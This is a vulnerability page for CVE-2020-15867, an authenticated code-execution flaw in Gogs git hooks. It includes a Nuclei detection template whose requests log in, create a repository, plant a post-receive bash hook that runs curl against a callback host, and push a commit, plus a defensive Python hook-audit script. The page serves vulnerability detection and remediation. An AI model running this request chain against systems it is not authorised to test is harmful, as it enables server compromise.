Gogs 0.5.5 - 0.12.2 - Remote Code Execution
ID: CVE-2020-15867
Severity: high
Author: theamanrawat
Tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive
Description
Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a “product UI does not warn user of unsafe actions” issue.
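Because any custom hook a repository owner can save runs server-side on push, the practical defensive check on an instance that cannot be upgraded yet is an inventory of every custom hook on disk. The audit below is an added example, not part of the Nuclei template or the Gogs project; it assumes the Gogs on-disk layout <repo_root>/<owner>/<name>.git with user-supplied scripts under custom_hooks/ (an assumption not stated on this page) and runs against a constructed sample tree.

```python
"""Audit a Gogs repository root for custom git hooks (added example, not part
of the Nuclei template or of Gogs itself).

Assumption (not stated on the page): Gogs keeps bare repositories under
<repo_root>/<owner>/<name>.git and stores hook scripts saved through the web
UI in <repo>.git/custom_hooks/<hook>. Any non-empty script there executes on
the server during a push, which is the primitive CVE-2020-15867 abuses, so
each one is listed for review regardless of what it contains.
"""
import tempfile
from pathlib import Path

HOOK_NAMES = ("pre-receive", "update", "post-receive")


def audit_custom_hooks(repo_root):
    """Return sorted (owner/repo, hook_name, first_line) tuples, one per
    non-empty custom hook found below repo_root."""
    findings = []
    for hooks_dir in Path(repo_root).glob("*/*.git/custom_hooks"):
        repo = hooks_dir.parent
        label = f"{repo.parent.name}/{repo.name[:-len('.git')]}"
        for name in HOOK_NAMES:
            script = hooks_dir / name
            if not script.is_file():
                continue
            body = script.read_text(errors="replace").strip()
            if not body:
                continue  # an empty file is the "no hook" state
            findings.append((label, name, body.splitlines()[0]))
    return sorted(findings)


def build_sample_root():
    """Construct a throwaway repo root (constructed sample data): one repo
    with an empty hook file and one with a real post-receive script."""
    root = Path(tempfile.mkdtemp(prefix="gogs-audit-"))
    clean = root / "alice" / "docs.git" / "custom_hooks"
    clean.mkdir(parents=True)
    (clean / "update").write_text("")
    hooked = root / "bob" / "tools.git" / "custom_hooks"
    hooked.mkdir(parents=True)
    (hooked / "post-receive").write_text("#!/bin/bash\r\necho deployed\n")
    return root


if __name__ == "__main__":
    for owner_repo, hook, head in audit_custom_hooks(build_sample_root()):
        print(f"{owner_repo}: custom {hook} hook, first line {head!r}")
```

Point the function at the real repository root of a Gogs instance to list every hook worth reviewing; the CRLF line endings written by the web editor are normalised by read_text, so the first line compares cleanly.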
YAML Source
id: CVE-2020-15867

info:
  name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).
  reference:
    - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
    - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2020-15867
    epss-score: 0.96659
    epss-percentile: 0.99554
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: gogs
    product: gogs
    shodan-query:
      - cpe:"cpe:2.3:a:gogs:gogs"
      - http.title:"sign in - gogs"
    fofa-query: title="sign in - gogs"
    google-query: intitle:"sign in - gogs"
  tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}

      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on

      - |
        POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}

      - |
        GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body_1
        words:
          - content="Gogs

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true

      - type: regex
        name: last_commit
        group: 1
        regex:
          - name="last_commit" value="(.*)"
        internal: true
# digest: 4b0a00483046022100b236fc0554b8687674b023685a537d424e10fab9dc3193ce0b8c664edb7633a202210095efb43fa800690bcd19ec8a5940efbd49600adce7fa59b81cea983aaae46ef5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks a Gogs instance for CVE-2020-15867 by logging in with the supplied credentials, creating a private repository, saving a post-receive hook, and pushing a commit; a callback to the interactsh server confirms the hook ran. Run it with the Nuclei tool against the target URL:
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15867.yaml"